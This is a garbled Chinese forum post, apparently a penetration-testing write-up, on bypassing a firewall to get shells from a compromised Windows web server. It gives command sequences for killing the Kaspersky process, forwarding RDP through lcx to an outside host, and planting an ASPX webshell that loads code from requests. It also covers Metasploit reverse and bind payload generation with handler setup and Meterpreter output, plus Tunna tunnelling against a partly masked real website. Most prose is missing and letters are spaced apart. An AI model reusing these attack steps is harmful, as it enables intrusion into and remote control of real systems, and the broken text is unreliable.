[22036] 2021-06-03_记一次绕过防火墙反弹转发姿势小结

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-18
2021-06-03_记一次绕过防火墙反弹转发姿势小结 0 x 0 1   0 x 0 2   L c x 0 x 0 3   A s p x   C l i e n t 姿 3 h a d 0 w   L e m o n S e c   2 0 2 1 - 0 6 - 0 3 D a t e / t i m e 2 0 1 4 K a s p e r s k y   A n t i - V i r u s   8 . 0 使 L c x k a v f s w p . e x e E X P M S F M S F k a v f s w p . e x e K a s p e r s k y 使 L c x . e x e 1 2 3 4 5 1 S Y N _ S E N T @ K o M a s 使 L c x 8 0 8 0 S u c c e s s   ! A s p x   C l i e n t t a s k k i l l   / f   / i m   k a v f s w p . e x e C : R e c o v e r y l c x . e x e   - l i s t e n   5 1   1 2 3 4 C : R e c o v e r y l c x . e x e   - s l a v e   1 1 3 . x x x . x x . 5   5 1   1 2 7 . 0 . 0 . 1   3 3 8 9 [ o p t i o n : ]     - l i s t e n   < C o n n e c t P o r t >   < T r a n s m i t P o r t >     - t r a n       < C o n n e c t P o r t >   < T r a n s m i t H o s t >   < T r a n s m i t P o r t >     - s l a v e     < C o n n e c t H o s t >   < C o n n e c t P o r t >   < T r a n s m i t H o s t >   < T r a n s m i t P o r t > < % @   P a g e   L a n g u a g e = " C # "   V a l i d a t e R e q u e s t = " f a l s e "   % >
0 x 0 4   M e t a s p l o i t ( 1 )   R e v e r s e _ t c p 使 M e t a s p l o i t p o r t . e x e W e b s h e l l M e t a s p l o i t   b i n d _ t c p r e v e r s e _ t c p 8 0 4 4 3 8 0 8 0 8 0 M e t e r p r e t e r S u c c e s s   ! < % @   P a g e   L a n g u a g e = " C # "   V a l i d a t e R e q u e s t = " f a l s e "   % > < % t r y {   S y s t e m . R e f l e c t i o n . A s s e m b l y . L o a d ( R e q u e s t . B i n a r y R e a d ( i n t . P a r s e ( R e q u e s t . C o o k i e s [ " p s w " ] . V a l u e ) ) ) . C r e a t e I n s t a n c e ( " c " , t r u e ,   S y s t e m . R e f l e c t i o n . B i n d i n g F l a g s . D e f a u l t ,   n u l l ,   n e w   o b j e c t [ ]   {   t h i s   } ,   n u l l ,   n u l l ) ;   }   c a t c h   {   } % > C : R e c o v e r y l c x . e x e   - l i s t e n   5 2   1 2 3 4 [ + ]   L i s t e n i n g   p o r t   5 2   . . . . . . [ + ]   L i s t e n   O K ! [ + ]   L i s t e n i n g   p o r t   1 2 3 4   . . . . . . [ + ]   L i s t e n   O K ! [ + ]   W a i t i n g   f o r   C l i e n t   o n   p o r t : 5 2   . . . . . . r o o t @ d i x 1 : ~ #   m s f p a y l o a d   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p   L H O S T = 1 1 3 . * * * . * * . 2 5 0   L P O R T = 1 2 3 4 5   X   >   / m e d i a / h a k e / p o r t . e x e m s f   >   u s e   e x p l o i t / m u l t i / h a n d l e r m s f   e x p l o i t ( h a n d l e r )   >   s e t   P A Y L O A D   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p m s f   e x p l o i t ( h a n d l e r )   >   s e t   L H O S T   1 9 2 . 1 6 8 . 1 . 1 0 m s f   e x p l o i t ( h a n d l e r )   >   s e t   L P O R T   1 2 3 4 5 m s f   e x p l o i t ( h a n d l e r )   >   e x p l o i t [ * ]   S t a r t e d   r e v e r s e   h a n d l e r   o n   1 9 2 . 1 6 8 . 1 . 1 0 : 1 2 3 4 5   [ * ]   S t a r t i n g   t h e   p a y l o a d   h a n d l e r . . .
( 2 )   B i n d _ t c p 使 b i n d _ t c p 使 9 9 9 9 9 9 9 9 I P T C P ( 3 )   R e v e r s e _ h t t p M e t a s p l o i t _ R e v e r s e _ h t t p 9 0 s e c D M _ m e t a s p l o i t 使 @ d a r k z 3 r 使 4 4 3 4 4 3 r o o t @ d i x 1 : ~ #   m s f p a y l o a d   w i n d o w s / m e t e r p r e t e r / b i n d _ t c p   L P O R T = 9 9 9 9   X   >   / m e d i a / h a k e / p o r t . e x e m s f   >   u s e   e x p l o i t / m u l t i / h a n d l e r m s f   e x p l o i t ( h a n d l e r )   >   s e t   P A Y L O A D   w i n d o w s / m e t e r p r e t e r / b i n d _ t c p m s f   e x p l o i t ( h a n d l e r )   >   s e t   R H O S T   8 0 . * * . * * . 2 1 m s f   e x p l o i t ( h a n d l e r )   >   s e t   L P O R T   9 9 9 9 m s f   e x p l o i t ( h a n d l e r )   >   e x p l o i t [ * ]   S t a r t e d   b i n d   h a n d l e r [ * ]   S t a r t i n g   t h e   p a y l o a d   h a n d l e r . . . r o o t @ d i x 1 : ~ #   m s f p a y l o a d   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ h t t p   L H O S T = 1 1 3 . * * * . * * . 2 3 6   L P O R T = 4 4 4 4   R   |   m s f e n c o d e   - t   a s p x   - o   / m e d i a / h a k e / p o r t . a s p x m s f   >   u s e   e x p l o i t / m u l t i / h a n d l e r m s f   e x p l o i t ( h a n d l e r )   >   s e t   P A Y L O A D   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ h t t p m s f   e x p l o i t ( h a n d l e r )   >   s e t   L H O S T   1 9 2 . 1 6 8 . 1 . 9 m s f   e x p l o i t ( h a n d l e r )   >   s e t   L P O R T   4 4 4 4 m s f   e x p l o i t ( h a n d l e r )   >   e x p l o i t [ * ]   S t a r t e d   H T T P   r e v e r s e   h a n d l e r   o n   h t t p : / / 0 . 0 . 0 . 0 : 4 4 4 4 / [ * ]   S t a r t i n g   t h e   p a y l o a d   h a n d l e r . . .
0 x 0 5   r e D u h _ G u i ( 4 )   R e v e r s e _ h t t p s R e v e r s e _ t c p 1 2 3 4 r e v e r s e _ h t t p 4 4 4 4 r e v e r s e _ h t t p s 4 4 4 4 M e t e r p r e t e r r e D u h _ G u i A S P X / P H P / J S P A S P X / P H P A S P X r o o t @ d i x 1 : ~ #   m s f p a y l o a d   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ h t t p s   L H O S T = 1 1 3 . * * * . * * . 1 0 6   L P O R T = 4 4 4 4   X   >   / m e d i a / h a k e / t e s t . e x e m s f   >   u s e   e x p l o i t / m u l t i / h a n d l e r m s f   e x p l o i t ( h a n d l e r )   >   s e t   P A Y L O A D   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ h t t p s P A Y L O A D   = >   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ h t t p s m s f   e x p l o i t ( h a n d l e r )   >   s e t   L H O S T   1 9 2 . 1 6 8 . 1 . 9 m s f   e x p l o i t ( h a n d l e r )   >   s e t   L P O R T   4 4 4 4 m s f   e x p l o i t ( h a n d l e r )   >   e x p l o i t [ * ]   S t a r t e d   H T T P S   r e v e r s e   h a n d l e r   o n   h t t p s : / / 0 . 0 . 0 . 0 : 4 4 4 4 / [ * ]   S t a r t i n g   t h e   p a y l o a d   h a n d l e r . . . [ * ]   1 1 3 . * * * . * * . 1 0 6 : 2 0 6 9   R e q u e s t   r e c e i v e d   f o r   / 5 x W X . . . [ * ]   1 1 3 . * * * . * * . 1 0 6 : 2 0 6 9   S t a g i n g   c o n n e c t i o n   f o r   t a r g e t   / 5 x W X   r e c e i v e d . . . [ * ]   P a t c h e d   u s e r - a g e n t   a t   o f f s e t   6 6 3 6 5 6 . . . [ * ]   P a t c h e d   t r a n s p o r t   a t   o f f s e t   6 6 3 3 2 0 . . . [ * ]   P a t c h e d   U R L   a t   o f f s e t   6 6 3 3 8 4 . . . [ * ]   P a t c h e d   E x p i r a t i o n   T i m e o u t   a t   o f f s e t   6 6 4 2 5 6 . . . [ * ]   P a t c h e d   C o m m u n i c a t i o n   T i m e o u t   a t   o f f s e t   6 6 4 2 6 0 . . . [ * ]   M e t e r p r e t e r   s e s s i o n   3   o p e n e d   ( 1 9 2 . 1 6 8 . 1 . 5 : 4 4 4 4   - >   8 0 . * * . * * . 2 1 : 2 0 6 9 )   a t   2 0 1 4 - 0 8 - 0 5   2 3 : 4 9 : 2 0   + 0 8 0 0
0 x 0 6   H t t p _ T u n n a 0 x 0 7   B y p a s s   F i r e w a l l r e D u h T u n n a r e G e o r g H T T P H t t p _ T u n n a r e D u h _ G u i H t t p _ T u n n a r e D u h _ G u i A S P X / P H P / J S P M e t a s p l o i t 使 t u n n a _ e x p l o i t . r b M S F r e D u h _ G u i H t t p _ T u n n a 姿 H t t p _ T u n n a   A S P X @ J S P P H P .   使 8 0 / 4 4 3 S u c c e s s   ! .   使 B i n d _ t c p F a i l u r e ! r o o t @ d i x 1 : ~ #   r u b y   p r o x y . r b   - u   h t t p : / / w w w . c a n t o n * * * * * * * * * d o l o n n e . f r / u _ f i c h i e r / c o n n . a s p x   - l   1 2 3 4   - r   3 3 8 9   - v m s f   >   u s e   e x p l o i t / w i n d o w s / m i s c / t u n n a _ e x p l o i t m s f   e x p l o i t ( t u n n a _ e x p l o i t )   >   s e t   P A Y L O A D   w i n d o w s / m e t e r p r e t e r / b i n d _ t c p m s f   e x p l o i t ( t u n n a _ e x p l o i t )   >   s e t   R H O S T   1 1 3 . * * * . * * . 2 3 6 m s f   e x p l o i t ( t u n n a _ e x p l o i t )   >   s e t   T A R G E T U R I   h t t p : / / w w w . c a n t o n * * * * * * * * * d o l o n n e . f r / u _ f i c h i e r / c o n n . a s p x m s f   e x p l o i t ( t u n n a _ e x p l o i t )   >   s e t   V E R B O S E   t r u e m s f   e x p l o i t ( t u n n a _ e x p l o i t )   >   e x p l o i t   - j 1 .   L c x 2 .   A s p x   C l i e n t 3 . 1   R e v e r s e _ t c p 3 . 3   R e v e r s e _ h t t p 3 . 3   R e v e r s e _ h t t p s 3 . 2   B i n d _ t c p
.   使 H T T P r e D u h _ G u i T u n n a _ 0 . 1 S u c c e s s   ! L e m o n S e c 4 .   r e D u h _ G u i 5 .   H t t p _ T u n n a r e G e o r g n e o _ r e G e o r g
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则